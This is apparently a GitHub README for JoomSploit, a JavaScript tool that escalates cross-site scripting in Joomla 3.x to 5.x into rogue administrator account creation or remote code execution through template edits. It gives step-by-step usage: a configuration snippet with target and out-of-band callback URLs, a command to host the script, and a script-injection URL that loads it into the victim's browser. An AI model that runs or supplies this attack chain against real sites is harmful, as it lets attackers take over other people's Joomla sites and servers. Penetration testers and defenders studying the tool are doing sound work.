Skip to content

Latest commit

 

History

History
124 lines (100 loc) · 5.43 KB

README.md

File metadata and controls

124 lines (100 loc) · 5.43 KB


JoomSploit

Joomla Exploitation Script that elevate XSS to RCE or Others Critical Vulnerabilities.

About - Key Features - How To Use - Examples - Contributing

screenshot

About

JoomSploit is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in Joomla CMS.

🌾 This script provides support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X.

Key Features

  • Privilege Escalation
    • Creates an user in Joomla.
  • (RCE) Built-In Templates Edit
    • Edit a Built-In Templates in Joomla.
  • (Custom) Custom Exploits
    • Custom Exploits for Third-Party Joomla Plugins.

How To Use

example.mp4

1) Clone the Repository

git clone https://github.com/nowak0x01/JoomSploit

2) Edit the script by selecting the desired function and modifying its variable values. (Example: JLCreateAccount)

// ************************************ ~% Variables %~ ************************************ //

var Target = "http://10.5.87.12:8000/"; // Ex: https://192.168.1.99:6731/joomla/
var Callback = "https://prkiw0jsy7n0dj9qknrm57h9006ruji8.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

// JLCreateAccount(); // (Privilege Escalation) - Creates an user in Joomla.
// JLEditTemplates(); // (RCE) - Edit Templates in Joomla.
// CustomExploits(); // (Custom) - Custom Exploits for Third-Party Joomla Plugins.

function JLCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Username = "nowak";         // (It is recommended to use a valid employee name from the target company). - <Mandatory>
    var Name = "Hudson Nowak";                 // Account name, Ex: Robert Silva. - <Mandatory>
    var Password = `j^QEkyvd7*g3`;          // (Password minimum length: 12) [weak password are allowed]. - <Mandatory>
    var Email = "nowak@example.com";  // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
    /* ************************************************************************************************************************************************ */

3) Start a web server

php -S 0.0.0.0:80 -t .

4) Go to the Joomla XSS vector and include JoomSploit.js

https://example.com/plugin.php?s=<script%20src="//VPS/JoomSploit.js"></script>

Examples

🎋 JLCreateAccount() - Creates an user in Joomla.

CreateAccount.mp4

🐉 JLEditTemplates() - Edit a Built-In Templates in Joomla.

EditTemplates.mp4

⭐️ CustomExploits() - Custom Exploits for Third-Party Joomla Plugins.
// pending


Contributing

If you're interested in contributing, whether by adding new exploit functions to CustomExploits() or enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better😊.

                               /T /I
                              / |/ | .-~/
                          T\ Y  I  |/  /  _
         /T               | \I  |  I  Y.-~/
        I l   /I       T\ |  |  l  |  T  /
     T\ |  \ Y l  /T   | \I  l   \ `  l Y
 __  | \l   \l  \I l __l  l   \   `  _. |
 \ ~-l  `\   `\  \  \\ ~\  \   `. .-~   |
  \   ~-. "-.  `  \  ^._ ^. "-.  /  \   |
.--~-._  ~-  `  _  ~-_.-"-." ._ /._ ." ./
 >--.  ~-.   ._  ~>-"    "\\   7   7   ]
^.___~"--._    ~-{  .-~ .  `\ Y . /    |
 <__ ~"-.  ~       /_/   \   \I  Y   : |
   ^-.__           ~(_/   \   >._:   | l______
       ^--.,___.-~"  /_/   !  `-.~"--l_ /     ~"-.
              (_/ .  ~(   /'     "~"--,Y   -=b-. _)         JoomSploit (https://github.com/nowak0x01/JoomSploit)
               (_/ .  \  :           / l      c"~o \
                \ /    `.    .     .^   \_.-~"~--.  )
                 (_/ .   `  /     /       !       )/
                  / / _.   '.   .':      /        '
                  ~(_/ .   /    _  `  .-<_
                    /_/ . ' .-~" `.  / \  \          ,z=.
                    ~( /   '  :   | K   "-.~-.______//
                      "-,.    l   I/ \_    __{--->._(==.
                       //(     \  <    ~"~"     //
                      /' /\     \  \     ,v=.  ((
                    .^. / /\     "  }__ //===-  `
                   / / ' '  "-.,__ {---(==-    @Author: Hudson Nowak
                 .^ '       :  T  ~"   ll
                / .  .  . : | :!        \\
               (_/  /   | | j-"          ~^
                 ~-<_(_.^-~"